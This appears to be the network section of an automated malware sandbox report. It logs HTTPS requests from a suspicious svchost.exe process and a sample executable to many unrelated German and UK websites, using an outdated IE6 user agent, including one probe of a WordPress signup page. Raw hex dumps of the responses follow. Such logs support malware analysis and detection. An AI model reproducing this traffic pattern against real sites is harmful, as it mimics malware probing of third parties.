                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: nts-web.net


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      69192.168.2.524947138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1170OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: diamir.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1170INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:37 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 162
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1170INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      7192.168.2.550314185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:31 UTC65OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: techtrans.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:31 UTC66INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:44:31 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:31 UTC67INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      70192.168.2.525237138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1170OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: www.diamir.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1171INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:37 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 548
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1171INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      71192.168.2.5252395.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1170OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1171INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:37 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      Content-Length: 51841
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1172INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1188INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                                                      Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1204INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1220INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                                                      Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      72192.168.2.52590983.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1222OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: dataform.co.uk
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:38 UTC1224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=2, max=91
                                                                                                                                                                                                                                                                                                      Content-Length: 48938
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                                                      X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:37 GMT
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:38 UTC1224INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:38 UTC1227INData Raw: 7d 72 65 74 75 72 6e 21 31 7d 28 6f 5b 72 5d 29 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 2c 22 66 6c 61 67 22 21 3d 3d 6f 5b 72 5d 26 26 28 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 29 3b 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 74 2e 73 75 70 70 6f 72 74 73 2e
                                                                                                                                                                                                                                                                                                      Data Ascii: }return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:38 UTC1235INData Raw: 34 20 30 2e 38 3b 30 2e 32 20 30 2e 36 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 38 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72
                                                                                                                                                                                                                                                                                                      Data Ascii: 4 0.8;0.2 0.6 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(8)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:38 UTC1243INData Raw: 68 22 3a 22 54 79 70 65 20 74 6f 20 73 65 61 72 63 68 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6b 62 2d 73 75 70 70 6f 72 74 2f 61 73 73 65 74 73 2f 6a 73 2f 6b 62 73 2d 61 6a 61 78 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 35 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73
                                                                                                                                                                                                                                                                                                      Data Ascii: h":"Type to search"};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/kb-support/assets/js/kbs-ajax.min.js?ver=1.5.4'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/revs
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:38 UTC1251INData Raw: 72 65 6d 6f 76 65 4c 6f 61 64 69 6e 67 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 6f 61 64 2e 63 6c 61 73 73 4e 61 6d 65 2b 3d 22 20 6c 6f 61 64 65 72 2d 72 65 6d 6f 76 65 64 22 3b 7d 2c 35 30 30 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 20 74 79 70 65 3d 22 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f
                                                                                                                                                                                                                                                                                                      Data Ascii: removeLoading=setTimeout(function(){load.className+=" loader-removed";},500);});</script><link rel="icon" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg" type="" sizes="16x16"/><link rel="icon" href="https://dataform.co.uk/wp-co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:38 UTC1259INData Raw: 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 48 6f 6d 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 32 35 32 35 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 64 61 74 61 66 6f 72 6d 2d 6f 76 65 72 76 69 65 77 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: ass="menu-item-text"><span class="menu-text">Home</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-52525"><a href='https://dataform.co.uk/dataform-overview/' data-level='1'><span class="menu-item-text"><
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:38 UTC1267INData Raw: 63 65 28 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6e 6f 2d 6a 73 2f 2c 27 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 27 29 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4e 61 6d 65 3d 63 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 64 74 2d 74 68 65 37 2f 6a 73 2f 6d 61 69 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 36 2e 30 2e 31 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 70 63 66 37 3d 7b
                                                                                                                                                                                                                                                                                                      Data Ascii: ce(/woocommerce-no-js/,'woocommerce-js');document.body.className=c;</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/themes/dt-the7/js/main.min.js?ver=6.6.0.1'></script><script type='text/javascript'>//<![CDATA[var wpcf7={


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      73192.168.2.524562188.114.97.3443C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:38 UTC1223OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
